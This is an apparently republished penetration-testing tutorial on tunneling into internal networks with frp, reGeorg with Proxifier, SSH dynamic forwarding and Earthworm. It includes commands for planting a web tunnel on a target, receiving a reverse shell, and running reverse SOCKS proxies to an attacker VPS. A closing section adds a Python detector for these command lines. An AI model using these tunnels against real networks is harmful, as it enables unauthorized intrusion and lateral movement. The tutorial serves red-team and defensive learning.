Mastering Internal Network Tunneling: frp, reGeorg, SSH & Earthworm Techniques

Learn how to bypass internal network restrictions during penetration testing by using frp port forwarding, reGeorg with Proxifier, SSH dynamic tunnels, and Earthworm/Ew tools, complete with step‑by‑step commands, configuration files, and practical examples for establishing reliable internal proxies.

Liangxu Linux

During penetration testing it is common to encounter targets that reside in an internal network or are otherwise unreachable directly. This guide presents several practical traffic‑proxy and port‑forwarding methods that allow an attacker to tunnel traffic into the target's internal network.

frp Port Forwarding

frp is a high‑performance reverse proxy that supports TCP and UDP and can expose internal services to the public internet.

Download the binary package:

wget https://github.com/fatedier/frp/releases/download/v0.32.0/frp_0.32.0_linux_amd64.tar.gz

Extract the archive:

tar zxf frp_0.32.0_linux_amd64.tar.gz

Enter the directory:

cd frp_0.32.0_linux_amd64/

Configure the client (frpc.ini) with server_addr set to the public IP and server_port to the port used for communication (e.g., 1234). Configure the server (frps.ini) with the same server_port.

Start the server and client:

./frps -c frps.ini
./frpc -c frpc.ini

After the tunnel is active, Metasploit can listen on the local forwarded port (e.g., 1234) and receive a reverse shell from the internal host.

reGeorg + Proxifier

reGeorg is an upgraded version of reDuh that forwards internal ports through an HTTP/HTTPS tunnel. It consists of a server component (PHP/ASPX/JSP/Node.js) and a Python client that provides a SOCKS proxy.

Typical workflow:

Upload tunnel.nosocket.php to a web‑accessible directory on the target.

Run the client on the attacker machine:

python reGeorgSocksProxy.py -p 8888 -u http://192.168.114.129/tunnel.nosocket.php

Configure Proxifier to use the SOCKS5 proxy at 192.168.114.129:80 and set rule‑based routing so that only desired applications (e.g., browsers) use the proxy while others run direct.

Ensure python.exe is set to direct mode to avoid a proxy loop.

Once configured, internal web services become reachable through the proxy.

SSH Port Forwarding

Common SSH tunnel options:

-C  Enable compression
-f  Run in background
-N  No remote command (silent connection)
-g  Allow remote hosts to connect to local forwarded ports
-L  Local port forwarding
-R  Remote port forwarding
-D  Dynamic (SOCKS) forwarding
-p  Specify remote SSH port

Example of dynamic forwarding through a remote SSH server to create a SOCKS proxy:

ssh -CfNg -D 1111 [email protected] -p 44866

This command opens a local SOCKS4/5 proxy on port 1111 that forwards traffic through the remote SSH server to the internal target.

Earthworm (ew) Tool

Earthworm provides both forward and reverse SOCKS5 proxy capabilities for a wide range of platforms.

Forward SOCKS5 server (public IP available):

ew.exe -s ssocksd -l 888

Reverse SOCKS5 server (no public IP on target):

# On attacker VPS
./ew -s rcsocks -l 1260 -e 1261
# On internal target
ew.exe -s rssocks -d VPS_IP -e 1261

After the reverse tunnel is established, configure a local proxy client (e.g., SocksCap64) to use 127.0.0.1:1260. Browsers or other tools can then access internal services through this proxy.

proxychains‑ng Integration

proxychains‑ng can chain the SOCKS proxy with other tools such as nmap.

Installation (sourceforge):

./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config

Configure /etc/proxychains.conf:

socks5 148.xx.xx.xx 1260

Test the tunnel; successful output shows the internal web page content.

These techniques together provide a flexible toolbox for penetrating internal networks, allowing attackers to forward ports, establish SOCKS proxies, and route traffic through encrypted tunnels.
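
From the defender's side, each tunnel above leaves a recognizable process command line on the host that runs it. The detector below is an added example, not code from the original article; the event records, host names, addresses and rule labels are constructed for illustration, and it matches only the invocations shown in this guide.

```python
import re

EW_MODES = {"ssocksd", "rcsocks", "rssocks"}   # Earthworm -s values from the article
SSH_ARG_FLAGS = set("BbcDEeFIiJLlmOopQRSWw")   # ssh options that take a value

def ssh_dynamic_forward(args):
    """True if ssh arguments open a SOCKS listener (-D or -o DynamicForward)."""
    i = 0
    while i < len(args):
        tok, i = args[i], i + 1
        if len(tok) < 2 or tok[0] != "-":
            continue                       # destination or a bare word
        for j, flag in enumerate(tok[1:], start=2):
            if flag not in SSH_ARG_FLAGS:
                continue                   # boolean flag in a cluster such as -CfNg
            value = tok[j:]                # attached form: -D1111
            if not value and i < len(args):
                value, i = args[i], i + 1  # separate form: -D 1111
            if flag == "D" or (flag == "o" and value.lower().startswith("dynamicforward")):
                return True
            break                          # remainder of the token was the value
    return False

def classify(cmdline):
    """Return the tunneling technique a command line matches, or None."""
    argv = [t.strip("\"'") for t in cmdline.split()] or [""]
    names = [re.split(r"[\\/]", t)[-1].lower() for t in argv]
    exe = names[0][:-4] if names[0].endswith(".exe") else names[0]
    # Earthworm: key on the "-s <mode>" pair so a renamed binary still matches.
    for flag, mode in zip(argv, argv[1:]):
        if flag == "-s" and mode in EW_MODES:
            return "earthworm:" + mode
    if exe in ("frpc", "frps") or {"frpc.ini", "frps.ini"} & set(names):
        return "frp"
    if "regeorgsocksproxy.py" in names:
        return "regeorg-client"
    if exe == "ssh" and ssh_dynamic_forward(argv[1:]):
        return "ssh-dynamic-forward"
    return None

SAMPLE_EVENTS = [  # constructed process-creation records: (host, command line)
    ("web01", r"C:\Windows\Temp\svch0st.exe -s rssocks -d 203.0.113.10 -e 1261"),
    ("app02", "./frpc -c frpc.ini"),
    ("jump01", "ssh -CfNg -D 1111 user@198.51.100.7 -p 44866"),
    ("db03", "/usr/bin/python3 backup.py -s nightly"),
]

def scan(events):
    return [(host, classify(cmd)) for host, cmd in events if classify(cmd)]
```

Tokens are split on whitespace, so quoted paths containing spaces need a proper command-line parser before these rules are applied to production telemetry.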
